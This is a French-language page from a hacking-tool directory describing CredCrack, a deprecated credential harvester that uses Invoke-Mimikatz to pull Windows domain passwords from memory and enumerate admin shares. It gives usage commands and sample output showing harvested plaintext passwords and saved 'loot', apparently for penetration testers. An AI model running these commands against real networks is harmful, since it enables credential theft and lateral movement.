Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CredCrack — Un moissonneur de credentials rapide et furtif | Kitploit
Outils/GitHubGitHub/jobroche/credcrack
Mouvement LatéralCollecte d'InformationsPost-ExploitationTests d'Intrusion
GitHubjobroche/credcrack

CredCrack

Un moissonneur de credentials rapide et furtif

Voir le dépôt
6261075il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CredCrack

⛔ [DÉPRÉCIÉ]. Ce dépôt n'est plus maintenu. Veuillez plutôt utiliser CrackMapExec.

Introduction


CredCrack est un moissonneur d'identifiants rapide et furtif. Il exfiltre les identifiants de manière récursive en mémoire et en clair. Une fois terminé, CredCrack analyse et affiche les identifiants tout en identifiant les administrateurs de domaine obtenus. CredCrack permet également de lister et d'énumérer les accès aux partages, et oui, il est threadé !

CredCrack a été testé et fonctionne avec les outils natifs de Kali Linux. CredCrack nécessite uniquement que "Invoke-Mimikatz.ps1" de PowerSploit se trouve sous le répertoire /var/www. Télécharger Invoke-Mimikatz ici

Aide


root@kitploit:~
usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
                    [-l LHOST] [-t THREADS]

CredCrack - Un moissonneur d'identifiants furtif par Jonathan Broche (@g0jhonny)

arguments optionnels:
  -h, --help            affiche ce message d'aide et quitte
  -f FILE, --file FILE  Fichier contenant les IP à moissonner pour les identifiants. Une IP par ligne.
  -r RHOST, --rhost RHOST
                        IP de l'hôte distant à moissonner pour les identifiants.
  -es, --enumshares     Examine l'accès aux partages sur la ou les IP distantes
  -l LHOST, --lhost LHOST
                        IP de l'hôte local pour lancer les scans.
  -t THREADS, --threads THREADS
                        Nombre de threads (par défaut : 10)

Requis:
  -d DOMAIN, --domain DOMAIN
                        Domaine ou poste de travail
  -u USER, --user USER  Nom d'utilisateur du domaine

Exemples :

./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20
Télécharger l’outil

Exemples


Énumération des accès aux partages

root@kitploit:~
./credcrack.py -r 192.168.1.100 -d acme -u bob --es
Mot de passe :
 ---------------------------------------------------------------------
  CredCrack v1.1 par Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------
 
[*] Validation de 192.168.1.102
[*] Validation de 192.168.1.103
[*] Validation de 192.168.1.100

 -----------------------------------------------------------------
 192.168.1.102 - Windows 7 Professionnel 7601 Service Pack 1 
 -----------------------------------------------------------------
 
 OUVERT      \\192.168.1.102\ADMIN$ 
 OUVERT      \\192.168.1.102\C$ 

 -----------------------------------------------------------------
 192.168.1.103 - Windows Vista (TM) Intégrale 6002 Service Pack 2 
 -----------------------------------------------------------------
 
 OUVERT      \\192.168.1.103\ADMIN$ 
 OUVERT      \\192.168.1.103\C$ 
 FERMÉ    \\192.168.1.103\F$ 

 -----------------------------------------------------------------
 192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
 -----------------------------------------------------------------
 
 FERMÉ    \\192.168.1.100\ADMIN$ 
 FERMÉ    \\192.168.1.100\C$ 
 OUVERT      \\192.168.1.100\NETLOGON 
 OUVERT      \\192.168.1.100\SYSVOL 

[*] Terminé ! Effectué en 0.8s

Moissonnage d'identifiants


root@kitploit:~
./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Mot de passe :

 ---------------------------------------------------------------------
  CredCrack v1.1 par Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------
 
[*] Préparation de la scène
[*] Validation de 192.168.1.102
[*] Validation de 192.168.1.103
[*] Interrogation du groupe des administrateurs du domaine depuis 192.168.1.102
[*] Moissonnage des identifiants depuis 192.168.1.102
[*] Moissonnage des identifiants depuis 192.168.1.103

                  Le butin est arrivé...
                         __________
                        /\____;;___\    
                       | /         /    
                       `. ())oo() .      
                        |\(%()*^^()^\       
                       %| |-%-------|       
                      % \ | %  ))   |       
                      %  \|%________|       

                
[*] Hôte : 192.168.1.102 Domaine : ACME Utilisateur : jsmith Mot de passe : Good0ljm1th
[*] Hôte : 192.168.1.103 Domaine : ACME Utilisateur : daguy Mot de passe : P@ssw0rd1!

     1 administrateur de domaine trouvé et mis en évidence en jaune ci-dessus !

[*] Nettoyage
[*] Terminé ! Le butin se trouve dans le dossier /root/CCloot
[*] Effectué en 11.3s

Contact

Contactez-moi sur @g0jhonny pour toute question ou fonctionnalité que vous souhaiteriez voir dans la prochaine mise à jour. Pour les bogues, soumettez un problème !

Crédits

CredCrack n'aurait pas été possible sans les contributions des personnes suivantes. Vous êtes tous des rockstars ! @JosephBialek, @brav0hax, @altonjx et tous les autres ! Merci pour toutes vos contributions et vos retours qui ont permis d'améliorer ce script, continuez à les envoyer !